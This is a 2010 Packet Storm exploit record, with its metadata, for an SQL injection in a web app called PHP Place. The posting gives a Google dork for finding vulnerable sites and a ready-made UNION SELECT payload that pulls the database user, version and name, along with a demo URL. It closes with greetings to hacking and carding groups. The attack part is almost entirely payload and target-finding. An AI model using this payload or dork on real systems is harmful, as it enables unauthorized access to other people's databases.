ID PACKETSTORM:96145
Type packetstorm
Reporter jos_ali_joe
Modified 2010-11-25T00:00:00
Description
`===========================================
PHP Place SQL Injection Vulnerability
===========================================
[+]Title : PHP Place SQL Injection Vulnerability
[+]Software : PHP Place
[+]Vendor : NN
[+]Download : NN
[+]Author : jos_ali_joe
[+]Contact : josalijoe[at]yahoo[dot]com
[+]Home : http://josalijoe.wordpress.com/
.___ .___ .__ _________ .___
| | ____ __| _/ ____ ____ ____ ______|__|_____ ____ \_ ___ \ ____ __| _/ ____ _______
| | / \ / __ | / _ \ / \ _/ __ \ / ___/| |\__ \ / \ / \ \/ / _ \ / __ | _/ __ \ \_ __ \
| || | \/ /_/ | ( <_> )| | \\ ___/ \___ \ | | / __ \_| | \\ \____( <_> )/ /_/ | \ ___/ | | \/
|___||___| /\____ | \____/ |___| / \___ >/____ >|__|(____ /|___| / \______ / \____/ \____ | \___ > |__|
\/ \/ \/ \/ \/ \/ \/ \/ \/ \/
########################################################################
Dork : inurl:"place.php?id="
########################################################################
------------------------------------------------------------------------
SQL Exploit
Exploit : +union+select+1,2,3,4,5,concat(user(),0x3a,versio n(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/josalijoe*
Demo
Exploit : http://127.0.0.1/place.php?id=+union+select+1,2,3,4,5,concat(user(),0x3a,versio n(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/josalijoe*
--------------------------------------------------------------------------
Greets For :
./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker - Tecon Crew
./Byroe Net - Yogya Carderlink - anten4 - Wannabe Hacker - DuniaSantai.com - All Underground Forum Indonesia
My Team : ./Indonesian Coder
Special Thanks :
Security Reason - Packetstorm Security
[+] Note :
Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban.
Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban,
Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.
`
{"type": "packetstorm", "published": "2010-11-25T00:00:00", "reporter": "jos_ali_joe", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "93e27f70c7a7281d939c5f2acf84d3a4"}, {"key": "modified", "hash": "892f6f5f74a94860407ce18caf515612"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "892f6f5f74a94860407ce18caf515612"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a20e5e59b62a71519b9e4417f0e20636"}, {"key": "sourceData", "hash": "848bf1b717b5b335ec27d83f1a884520"}, {"key": "sourceHref", "hash": "70d3a2837a0b2238971970be0d4a5321"}, {"key": "title", "hash": "2fc7308ca8bdbdfe5f277adda2f22eb2"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`=========================================== \nPHP Place SQL Injection Vulnerability \n=========================================== \n \n[+]Title : PHP Place SQL Injection Vulnerability \n[+]Software : PHP Place \n[+]Vendor : NN \n[+]Download : NN \n[+]Author : jos_ali_joe \n[+]Contact : josalijoe[at]yahoo[dot]com \n[+]Home : http://josalijoe.wordpress.com/ \n \n.___ .___ .__ _________ .___ \n| | ____ __| _/ ____ ____ ____ ______|__|_____ ____ \\_ ___ \\ ____ __| _/ ____ _______ \n| | / \\ / __ | / _ \\ / \\ _/ __ \\ / ___/| |\\__ \\ / \\ / \\ \\/ / _ \\ / __ | _/ __ \\ \\_ __ \\ \n| || | \\/ /_/ | ( <_> )| | \\\\ ___/ \\___ \\ | | / __ \\_| | \\\\ \\____( <_> )/ /_/ | \\ ___/ | | \\/ \n|___||___| /\\____ | \\____/ |___| / \\___ >/____ >|__|(____ /|___| / \\______ / \\____/ \\____ | \\___ > |__| \n\\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \n \n \n######################################################################## \n \nDork : inurl:\"place.php?id=\" \n \n######################################################################## \n \n------------------------------------------------------------------------ \n \nSQL Exploit \n \nExploit : +union+select+1,2,3,4,5,concat(user(),0x3a,versio n(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/josalijoe* \n \nDemo \n \nExploit : http://127.0.0.1/place.php?id=+union+select+1,2,3,4,5,concat(user(),0x3a,versio n(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/josalijoe* \n \n-------------------------------------------------------------------------- \n \n \nGreets For : \n \n./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker - Tecon Crew \n \n./Byroe Net - Yogya Carderlink - anten4 - Wannabe Hacker - DuniaSantai.com - All Underground Forum Indonesia \n \nMy Team : ./Indonesian Coder \n \nSpecial Thanks : \n \nSecurity Reason - Packetstorm Security \n \n \n[+] Note : \n \nHacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. \nJika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, \nBertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri. \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:24:45", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/96145/PHP-Place-SQL-Injection.html", "sourceHref": "https://packetstormsecurity.com/files/download/96145/phpplace-sql.txt", "title": "PHP Place SQL Injection", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-11-03T10:24:45"}, "dependencies": {"references": [], "modified": "2016-11-03T10:24:45"}, "vulnersScore": 0.2}, "references": [], "id": "PACKETSTORM:96145", "hash": "e1240413b7b076533b1ba93916424aeb45150061e6bfd4d72cc128dd10138bb1", "edition": 1, "cvelist": [], "modified": "2010-11-25T00:00:00", "description": ""}
{}
